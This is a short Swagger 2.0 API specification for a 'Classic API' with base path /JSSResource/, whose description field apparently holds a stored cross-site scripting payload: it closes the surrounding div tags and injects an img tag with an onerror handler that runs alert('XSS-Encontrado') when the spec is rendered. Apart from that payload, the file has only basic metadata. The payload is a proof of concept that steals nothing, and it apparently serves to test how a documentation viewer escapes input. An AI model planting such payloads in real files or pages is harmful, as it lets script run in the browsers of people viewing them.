swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    aaa</div></div></div><img onerror=alert('XSS-Encontrado') src=1>"><div><div><div>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
